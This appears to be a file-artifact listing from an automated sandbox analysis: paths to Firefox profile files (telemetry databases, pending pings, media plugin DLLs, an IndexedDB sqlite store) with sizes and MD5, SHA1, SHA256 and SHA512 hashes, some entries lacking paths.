C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD51e5386b7e85ad7d5b1bfbb9560ce1cec
SHA1e59df2eed2be1e5342d6ca6c55bff8efd54960f1
SHA256fececa1d4d20416d7a1dd1708c70e003c9df91ddf47c0e2c7053676c114ed863
SHA5126142846f6e8735f288b1566ef80c49f493f97f23e9f161e4a8c13bc8676eb7cc9710e611916c2566ab1a9f9ffa00f54644ace1aa9efa5d08af68361580ed5eb6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD53fcbaacc5af0cc78b0bed87560062963
SHA168903888aa1622ebc108336ae941d4d1ecdb7fc4
SHA256424d163fa57b35f389c6d584291b86758a6d6bfc89dd66ab664d61c03602ad51
SHA512b1a95ae2c41cc8f614164b4f9d6c1df3d8e88faf5bb6d7be2b642eebd06fe07e9ea749e818c7fc729dcfde070618fa4d13cf74d5f50aa29030500282aec22ebf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD565e93c67d8fc8ae4ad0fd5726e19c054
SHA179e78dc7d9c73dbbd784aa5203945dc05b08bd6b
SHA25639fe0729164161705457a308dcc7d90d82a7ae350e9577792d85775dfeefe371
SHA512cbbb7de2e4657295fd0fb79f0d029f593aacc319e7fd2b9a3ebb9dbf90daf9e22d90f66a59497d4c7d0e3c0b95c4fe1558508bcc09a93ec3ee5f28e1b96db54f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD51970f594da9d23fd4ec906bdb696c5f9
SHA19f3cb04a087810e20ceda04d6b1a9f720630fb48
SHA25697bcd1a2792e277b72ac0160dd02f656838c17ed420ffa82e3b9102e6f15a2a3
SHA512652c3b714cc949b2025c3a3c27b57bc91608e8689d55c2c873efb2a63cdcf4f1e9d6bb63f88aa36a02b0fa88439a136777ad231e55e7762082f9d3d7e0f8c801
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\datareporting\glean\pending_pings\05ffe0cc-37eb-4729-859e-6361a8ccf91b
Filesize27KB
MD52e5889d2a03c2ce33cfb6fb0a4da75b5
SHA12061163f418769fd79f03f3d2698a922fa057a7e
SHA25662ddc0f7edbf5f2832448b46b779cb26479bdb6461cf32c7d5932f226d36ecbc
SHA512ba022732fb4ee449d184ac0caf2fc61071c891d2b4e961edd08ffcebc2ef8edf1563855ddce29fdddec14366ef3e0f4d9c4583ba93f593eb0fc3c8ad311b6c44
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\datareporting\glean\pending_pings\09dd970c-acb7-4ecc-970f-aae3d7729295
Filesize671B
MD5c001a19ba192b91d1c492dceba5e650a
SHA18604ba616bb9f86401287088ab27e1197ec093f3
SHA2564ada4cb1d03e8ac909e67cddad27b7966946ea7dc9dd53c2de8b213e23ce2ed8
SHA512ce360877d48f04d748850d95f085943ae603eca58c821dc169126987a4d45481996d808740b8c74ca49e45b73510bae2eb8430d57860be0c1ff11672a2525670
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\datareporting\glean\pending_pings\ff174900-277c-43dc-bf88-dd4f6bd7479e
Filesize982B
MD5036d7b70d66c07888a0ec5245bcd2fac
SHA1485e4987b75de9377c18a955a8a7b06cf5f26058
SHA256802dfb12865931e2d10d5616ffc68f85535a700559b423c9eef7beaec1ebd443
SHA512e4b345a261a71c9c696c62329c4d6c225a7af2a9d8e9b8451b221ffb6a1e213e6db3f883940a388af214efc00aac9647ec42b57754fc87972a6a2df8773dbf01
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
12KB
MD511f1c5dc1c1e489d61437aed2398c713
SHA132248194724b25daa02b9eb17b42fd65247e98ad
SHA256033c3d71b97e5929de630c96b8976489ea79f599ba83c66549581a734841822d
SHA51207c46c818eba4534ce1e2a38344f49be2f37c6a216130217be4812796ec5d977fbd831f5e8848266899f1a53e2384f4227430d15466e80fcde9da6bd2cd692e9
-
Filesize
10KB
MD5edef6009f3e3aea8f7fbac5c2b477bcd
SHA1179ae2d6c3d341db4a94a920e8a602fc06d56879
SHA256a5f0e01c800fed8c2bd55147c2918be9475b6ccfa596ff7d813f7c96a6e6e280
SHA512b742ed1a97f94b389efb564383522196c414be4e646829db2e89c23e0455b40df104ac24e23ee7b335cf608f251d8b9413ef058f0b550aa7d13e4254fc11e949
-
Filesize
15KB
MD50329386ff195ee5fc025591ec5e177f3
SHA16be44f4b7156bc72ad9f016fa4062b862a519908
SHA2569d4fe5f39277ddfa28d77e0cdb336d695ca5e378e3473b916a55150a9a3d1137
SHA512a14d7659bb89ab2f0f362be6b6fe987708058c852bcb799ae49009759d84f19c106fa31d0fa8de8fc5926d66af3000919af122e56ae29df637a4a25ceb7ba8e8
-
Filesize
10KB
MD5562549bee9df2bffcc7772ea8ce43ed5
SHA154f22104db93d3253a9eea724319ef81a79b94a9
SHA2563a87edc01ee1c1949adcab96de314ecaf1dfb6f9a20f0efabfc6abda50db56cf
SHA512c28a91381909cc298407f159d21821d046ba550227229e3e1e3a1fa343c94bc17f0c6610c17b5226029c47339a6da0d1a1704b9453ea027773e395cec4cfbcc0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize1.8MB
MD53c52baf20f09b79633dc26dc9d81bd18
SHA153167ac53a4a5e94441ea7b195b80902cc012348
SHA25664f98d758c148197cb8e250a79025e153e43a19e1fcd1f4aa8f0323a057bfee8
SHA512319bdfa15f4d2504c87788f9d411e66585d792811fceddeaf7c21950dad5762ba8cf12b4134a507d964a41abbfc04f8662f54a9dcc4bd95391a7e4db82a2b0f1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yuzka873.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.0MB
MD5847f815d79c2ca2abe360f6ed917efbd
SHA14f1dcf1cb7e34435425772bddd62227a5ab211db
SHA2562ce5786ce6e6e5f69c54a19d635217aed96887c241787bc7a5da119e731ab968
SHA512b1a4063ff9568f52559fd8fda6bbda22be48063c1141c6f74cbd0a325ea826c2440e0c13ec2f17460c9e6bff0a2998342ea0c7bf51b7d954a7edcf9332b4f539
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e